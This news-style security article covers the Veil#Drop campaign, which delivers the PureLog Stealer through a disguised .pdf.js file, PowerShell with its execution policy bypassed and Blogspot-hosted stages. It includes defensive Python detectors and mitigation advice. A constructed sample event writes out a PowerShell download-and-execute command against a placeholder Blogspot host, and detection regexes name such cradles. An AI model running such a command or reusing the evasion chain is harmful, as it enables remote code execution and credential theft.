PureLog Stealer Uses Blogspot and PowerShell to Deliver Malware

Emy Elsamnoudy
July 3, 2026

Key Takeaways

  • A novel attack chain, dubbed Veil#Drop, leverages Google Blogspot and native Windows tools to deploy the PureLog Stealer.
  • The attack uses deceptive file extensions and memory-resident execution to evade traditional antivirus detection.
  • PureLog Stealer targets sensitive user data, including browser credentials, cookies, and cryptocurrency wallet information.
  • Detection relies on behavioral monitoring of PowerShell activity and network connections, rather than signature-based scanning.

Cybersecurity researchers have uncovered a sophisticated new malware campaign that exploits Google’s Blogspot platform and standard Windows utilities to deliver the PureLog Stealer. This attack chain, named Veil#Drop, is designed to bypass conventional security measures by masquerading malicious activities as routine system operations.

The campaign’s initial vector appears deceptively simple: a file named transcript.pdf.js. While it superficially resembles a legitimate PDF document, its .js extension designates it as a JavaScript file. Due to Windows’ default setting of hiding known file extensions, victims typically only see “transcript.pdf,” making the malicious nature of the file difficult to discern. This subtle deception is crucial to the attack’s success, as users are less likely to suspect a seemingly innocuous PDF document.
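The hidden-extension trick above is easy to reason about in code. The following is an added example (not code from the article or from the Securonix report): it reproduces what Explorer shows when "Hide extensions for known file types" is on, and flags names whose real, handler-selecting extension is a script or executable while the visible one looks like a document. The extension sets are this example's own assumptions, not a vendor list.

```python
# Added example (not from the Securonix report or the article): how the
# "hidden known extensions" default turns transcript.pdf.js into transcript.pdf
# on screen, and a triage helper that flags such double-extension names.
# The extension sets below are this example's own assumptions, not a vendor list.

EXECUTABLE_EXTENSIONS = {
    "js", "jse", "vbs", "vbe", "wsf", "wsh", "hta", "ps1",
    "exe", "scr", "com", "bat", "cmd", "lnk",
}
DOCUMENT_EXTENSIONS = {
    "pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "odp", "txt", "rtf",
}


def displayed_name(filename: str) -> str:
    """Name as Explorer shows it when 'Hide extensions for known file types' is on:
    only the final extension is hidden, so the decoy extension before it stays visible."""
    base, dot, _ext = filename.rpartition(".")
    return base if dot else filename


def real_extension(filename: str) -> str:
    """The extension Windows actually uses to pick a handler: the last one."""
    return filename.rpartition(".")[2].lower() if "." in filename else ""


def is_disguised_script(filename: str) -> bool:
    """True when the handler-selecting extension is executable but the name the
    user sees ends in a document-style extension (e.g. transcript.pdf.js)."""
    parts = filename.lower().split(".")
    if len(parts) < 3:          # needs at least name.decoy.real
        return False
    return parts[-1] in EXECUTABLE_EXTENSIONS and parts[-2] in DOCUMENT_EXTENSIONS


def triage(filenames):
    """Return (filename, what the user sees, flagged) for each candidate."""
    return [(f, displayed_name(f), is_disguised_script(f)) for f in filenames]


if __name__ == "__main__":
    # Constructed sample names; only the first and third should be flagged.
    for row in triage(["transcript.pdf.js", "report.pdf", "invoice.docx.exe", "archive.tar.gz"]):
        print(row)
```

The same check works as a mail-gateway or download-folder rule: `archive.tar.gz` is not flagged because neither of its extensions is executable, while `invoice.docx.exe` is, for the same reason `transcript.pdf.js` is.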

Upon execution, the JavaScript file runs under the Windows Script Host, which then launches PowerShell. Critically, this PowerShell instance is started with its execution policy bypassed, so none of the usual script restrictions apply. From there, PowerShell contacts attacker-controlled Blogspot pages to retrieve the next stages of the malware without writing any suspicious files to the local disk. This in-memory execution significantly complicates detection by file-based antivirus solutions.

Researchers from Securonix, who documented the framework in a report, named it Veil#Drop. The name reflects the technique of “veiling” malicious actions behind layers of encoding and by blending in with legitimate web traffic. Their analysis tracked the entire infection sequence, from the initial compromise to the exfiltration of sensitive data, including browser passwords and cryptocurrency wallet information.

The Veil#Drop campaign is particularly insidious because each step in its execution chain mimics normal system behavior. The use of PowerShell commands, visits to Google Blogspot domains, and reliance on trusted Microsoft utilities are all common occurrences in typical IT environments. This normalcy allows the attack to frequently evade detection by traditional antivirus and endpoint security tools that often overlook such activities.

Hackers Abuse Blogspot and PowerShell Download Cradles

The attack sequence begins when a victim interacts with the fake document hosted on a compromised website. When transcript.pdf.js is double-clicked, Windows Script Host silently launches PowerShell with its execution policy bypassed, so the downloaded code runs without the policy blocking it or raising a policy-violation alert. Note that PowerShell’s execution policy is a safety feature rather than a security boundary, which is why a single command-line switch defeats it and why the logging and application-control measures below matter more than the policy itself.

PowerShell then employs a “download cradle” technique, which involves fetching malicious code directly from a designated Blogspot page and executing it straight from memory. This method bypasses the need to write intermediate files to the hard drive, making it extremely difficult for many file-scanning tools to detect. By operating in memory, the malware minimizes its footprint on the compromised system, further enhancing its stealth.

The first retrieved payload, named phud.dudus.docx.pdf.olp.sys, immediately takes steps to cover its tracks. It deletes the initial JavaScript launcher, eliminating direct evidence of the infection’s origin, and terminates background processes that could potentially interfere with its operations. Subsequently, it decrypts a hidden payload using a repeating XOR key, revealing further malicious components.

This decrypted script dynamically constructs new Blogspot web addresses by appending random characters. This tactic ensures that each infection instance uses a unique URL, thwarting defenders who attempt to block the campaign using fixed lists of malicious domains. The constant generation of new URLs makes it challenging for security teams to maintain effective blacklists.

The next file fetched, niple.docx.odp.pdf.sys, contains two substantial blocks of encoded numeric data. These blocks are decoded into fully functional .NET programs, which are then loaded directly into memory using reflection. This advanced technique means that no executable file ever touches the disk, making the detection of these stages particularly difficult. Should this primary method of execution fail, the malware incorporates fallback mechanisms. It leverages legitimate, Microsoft-signed tools such as InstallUtil, MSBuild, RegSvcs, and the C# compiler, blending its malicious activity with trusted processes that security software typically ignores.

What PureLog Stealer Does Next

Once the PureLog Stealer is fully active, it systematically harvests a wide array of valuable data from the compromised system. This includes sensitive information such as saved browser passwords, cookies, autofill entries, browsing history, and critical cryptocurrency wallet details. The stealer also meticulously collects comprehensive information about the infected system, providing attackers with a detailed understanding of their compromised environment. All these operations occur stealthily, often without any discernible indicators to the user that their system has been compromised.

Given that the entire attack chain largely operates from memory and avoids writing persistent files to disk, conventional antivirus scans are prone to missing this threat. Security teams are therefore advised to shift their focus towards behavioral monitoring. This includes actively watching for unusual PowerShell activity, such as connections to Blogspot domains, or instances where PowerShell spawns tools it wouldn’t typically interact with. Such anomalous behaviors can serve as crucial early warning signs of an ongoing attack.
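What "behavioral monitoring" looks like in practice can be made concrete. The following is an added example, not code from the article or from Securonix: it runs the checks the text describes (a script host spawning PowerShell, an execution-policy bypass, an in-memory download cradle, a Blogspot host matched by pattern rather than by a fixed domain list, and PowerShell handing off to InstallUtil, MSBuild, RegSvcs or csc.exe) over constructed process-creation records. The pipe-delimited event layout, the sample command lines and the `abc123-example.blogspot.com` host are all constructed for this example and stand in for Sysmon Event ID 1 or Security 4688 telemetry.

```python
import re

# Added example (not the article's or Securonix's code): behaviour-based checks
# for the Veil#Drop pattern over process-creation telemetry. The events below are
# constructed for this example in a simple "time|parent image|image|command line"
# layout standing in for Sysmon Event ID 1 / Security 4688 records.
SAMPLE_EVENTS = r"""
09:00:01|C:\Windows\explorer.exe|C:\Windows\System32\wscript.exe|wscript.exe "C:\Users\alice\Downloads\transcript.pdf.js"
09:00:02|C:\Windows\System32\wscript.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://abc123-example.blogspot.com/p/x.html')"
09:00:05|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe|InstallUtil.exe /logfile= /LogToConsole=false C:\Users\alice\AppData\Local\Temp\a.dll
09:05:00|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe Get-ChildItem C:\Projects
09:06:00|C:\Windows\System32\services.exe|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs
""".strip().splitlines()

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Signed Microsoft tools the article names as the fallback loaders.
DOTNET_TOOLS = {"installutil.exe", "msbuild.exe", "regsvcs.exe", "csc.exe"}

EP_BYPASS = re.compile(r"-(?:ex\w*|ep)\s+bypass", re.I)      # -ExecutionPolicy Bypass, -ep bypass
CRADLE = re.compile(
    r"downloadstring|downloaddata|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|"
    r"invoke-expression|\biex\b", re.I)
# Match the host pattern, not a fixed list: the campaign rotates the subdomain per infection.
BLOGSPOT_URL = re.compile(r"https?://[^\s'\"]*blogspot\.com[^\s'\"]*", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze_event(line: str):
    """Return (code, detail) findings for one process-creation record."""
    _time, parent, image, cmdline = line.split("|", 3)
    parent_b, image_b = basename(parent), basename(image)
    findings = []
    if parent_b in SCRIPT_HOSTS and image_b in POWERSHELL:
        findings.append(("WSH_SPAWNS_PS", f"{parent_b} -> {image_b}"))
    if image_b in POWERSHELL:
        if EP_BYPASS.search(cmdline):
            findings.append(("EP_BYPASS", "execution policy bypassed on the command line"))
        if CRADLE.search(cmdline):
            findings.append(("DOWNLOAD_CRADLE", "download-and-execute primitive in command line"))
        for url in BLOGSPOT_URL.findall(cmdline):
            findings.append(("BLOGSPOT_URL", url))
    if parent_b in POWERSHELL and image_b in DOTNET_TOOLS:
        findings.append(("PS_SPAWNS_DOTNET_TOOL", f"{parent_b} -> {image_b}"))
    return findings


def scan(lines):
    """Keep only events that produced findings, with time and image for triage."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        findings = analyze_event(line)
        if findings:
            time, _, image, _ = line.split("|", 3)
            alerts.append((time, basename(image), findings))
    return alerts


def matches_chain(lines) -> bool:
    """The combination is the signal: WSH launching PowerShell, an in-memory download
    cradle, and PowerShell handing off to a signed .NET tool. Any one alone shows up
    in ordinary admin tooling; all three together is the chain described above."""
    codes = {code for _, _, findings in scan(lines) for code, _ in findings}
    return {"WSH_SPAWNS_PS", "DOWNLOAD_CRADLE", "PS_SPAWNS_DOTNET_TOOL"} <= codes


if __name__ == "__main__":
    for time, image, findings in scan(SAMPLE_EVENTS):
        print(time, image, [code for code, _ in findings])
    print("Veil#Drop-like chain:", matches_chain(SAMPLE_EVENTS))
```

On the constructed input, the interactive `Get-ChildItem` session and the `svchost.exe` start produce nothing, while the two malicious events do; `matches_chain` only fires when the full sequence is present, which is the point of correlating stages rather than alerting on each one. In production the correlation should be scoped per host and time window, and the command-line checks should be backed by the script block logging the next section recommends, since `-EncodedCommand` or obfuscated cradles will not match these plain regexes.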

What You Should Do

  • Restrict Windows Script Host: Limit or disable the execution of scripts via Windows Script Host (WSH) in environments where it is not essential for business operations.
  • Enable PowerShell Logging: Implement comprehensive PowerShell logging across all endpoints to capture command executions and module activity. Regularly review logs for suspicious patterns and attempts to bypass execution policies.
  • Monitor Network Traffic: Employ network monitoring solutions to detect unusual outbound connections, especially from PowerShell or other legitimate utilities, to cloud platforms like Blogspot. Focus on behavioral anomalies rather than solely relying on domain reputation.
  • Implement Application Control: Utilize application control solutions (e.g., Windows Defender Application Control, AppLocker) to prevent the execution of unauthorized scripts and executables, thereby mitigating fallback techniques that rely on legitimate Microsoft tools.
  • Enforce Least Privilege: Ensure users operate with the principle of least privilege, restricting their ability to execute arbitrary scripts or modify system settings.
  • User Awareness Training: Educate employees about the dangers of deceptive file extensions and the importance of scrutinizing unexpected downloads. Advise caution regarding files with unusual double extensions (e.g., .pdf.js).
  • Regular Backups: Maintain regular, offsite backups of critical data to facilitate recovery in the event of a successful data theft or system compromise.
